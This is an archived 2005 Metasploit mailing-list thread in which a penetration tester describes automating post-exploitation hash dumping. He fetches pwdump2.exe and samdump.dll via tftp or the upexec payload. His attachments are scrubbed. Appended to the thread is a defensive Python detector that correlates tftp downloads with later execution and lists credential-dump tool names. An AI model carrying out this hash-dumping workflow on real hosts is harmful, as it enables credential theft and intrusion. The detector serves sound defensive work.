Metasploit mailing list archives
making your own payload
From: unknown.pentester at gmail.com (pagvac)
Date: Tue, 6 Dec 2005 17:01:18 +0000
I'll probably use the upexec payload since it seems very ideal in this case. Let me explain my exact scenario: When pentesting, some of the things we all do are very much the same all the time. For instance, I do the following steps all the time after getting a shell with admin privileges on a Windows machine (workstation, server or domain controller):

- enable a tftp server on my laptop (I use Solarwinds TFTP server)
- connect to my tftp server from the compromised target and download the pwdump executable and dll file (which is required to run the executable)

So what I did is the following. I wrote a simple and crappy program in C that drops pwdump2.exe and samdump.dll once it's executed. After that it dumps the password hashes (by calling the dropped pwdump2.exe) and prints them on the screen.
From this point on I can just grab the hashes from the remote shell with a simple-and-lame copy and paste. Anyways, I attached the .c and .exe file in case anyone is interested. The reason why I wrote this is because I wanted to make the root-shell/dump-hashes process a single shot attack. But now that you guys pointed out the upexec payload to me, it seems to me very stupid to waste my time setting up a tftp server on my laptop, when I can just tell metasploit to transfer and execute my "pwdump2.payload.exe" file when exploiting the target. Thank you very much for your help to both of you.

On 12/6/05, mmiller at hick.org <mmiller at hick.org> wrote:
> On Tue, Dec 06, 2005 at 04:24:04PM +0000, pagvac wrote:
> > I have an executable file which I would like to convert into a payload. That way I could use it with all the exploits that metasploit supports. This executable automates many tasks that I usually do on the target machines after compromising them when doing penetration testing. The problem is that I have no idea on how to remove all the nulls (0x00) so that the exploit doesn't break. I'd like to have some references on documentation/tools that can help me create this payload and successfully run it with metasploit on existing exploit modules. Question: are all payloads compatible with metasploit? In other words, can I get a shellcode from an external resource and use it successfully with metasploit?
>
> Converting an executable into shellcode is typically infeasible due to the nature in which most executables are compiled. One of the constraints also becomes the size of the shellcode produced and the manner in which it is to be transferred to the target. Is there a reason that you can't use the upexec payloads (upload and execute)? win32_xxx_upexec
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pwdump2.payload.c
Type: application/octet-stream
Size: 430164 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20051206/0a0239f6/attachment.obj>
-------------- next part --------------
A non-text attachment was scrubbed...
Name: pwdump2.payload.exe.bin
Type: application/octet-stream
Size: 106496 bytes
Desc: not available
URL: <http://mail.metasploit.com/pipermail/framework/attachments/20051206/0a0239f6/attachment.bin>
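A defender-side view of the workflow pagvac describes (tftp fetch of pwdump2.exe and samdump.dll from a compromised host, then execution of the dropped tool): this is an added example, not code from the thread or from Metasploit. It parses constructed Sysmon-style process-creation lines and correlates a tftp GET with later execution of the fetched file on the same host; field names, host names and the tftp server address are assumptions.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation lines (not real telemetry);
# field names, hosts and the tftp server address are assumptions.
SAMPLE_LOG = r"""host=WS01 pid=412 image=C:\Windows\System32\cmd.exe cmdline="cmd.exe"
host=WS01 pid=520 image=C:\Windows\System32\tftp.exe cmdline="tftp -i 10.0.0.5 GET pwdump2.exe"
host=WS01 pid=524 image=C:\Windows\System32\tftp.exe cmdline="tftp -i 10.0.0.5 GET samdump.dll"
host=WS01 pid=530 image=C:\Temp\pwdump2.exe cmdline="pwdump2.exe"
host=WS02 pid=610 image=C:\Windows\System32\tftp.exe cmdline="tftp 10.0.0.9 PUT report.txt"
host=WS02 pid=615 image=C:\Windows\System32\notepad.exe cmdline="notepad.exe"
"""

# File names the thread itself mentions; extend from your own intel.
CRED_DUMP_TOOLS = {"pwdump2.exe", "samdump.dll"}


def parse_record(line):
    """Turn 'key=value key="quoted value"' into a dict; quotes are stripped."""
    fields = re.findall(r'(\w+)=("[^"]*"|\S+)', line)
    return {k: v.strip('"') for k, v in fields}


def basename(path):
    """Case-insensitive Windows basename."""
    return path.rsplit("\\", 1)[-1].lower()


def analyze(log_text):
    """Return (host, pid, severity, reason) alerts, in log order."""
    fetched = defaultdict(set)  # host -> file names pulled in via tftp GET
    alerts = []
    for line in log_text.splitlines():
        rec = parse_record(line)
        if not all(k in rec for k in ("host", "pid", "image")):
            continue  # malformed line: skip rather than crash the pipeline
        host, pid = rec["host"], int(rec["pid"])
        image, cmd = basename(rec["image"]), rec.get("cmdline", "")
        if image == "tftp.exe":
            # Windows tftp syntax: tftp [-i] host GET source [destination]
            m = re.search(r"\bGET\s+(\S+)", cmd, re.IGNORECASE)
            if m:
                name = basename(m.group(1))
                fetched[host].add(name)
                alerts.append((host, pid, "medium", f"tftp download of {name}"))
            continue
        if image in fetched[host]:
            alerts.append((host, pid, "high", f"execution of tftp-fetched file {image}"))
        elif image in CRED_DUMP_TOOLS:
            alerts.append((host, pid, "high", f"known credential dump tool {image}"))
    return alerts
```

`analyze(SAMPLE_LOG)` yields two medium alerts for the tftp downloads on WS01 and one high alert when the fetched pwdump2.exe runs; WS02's tftp PUT produces nothing.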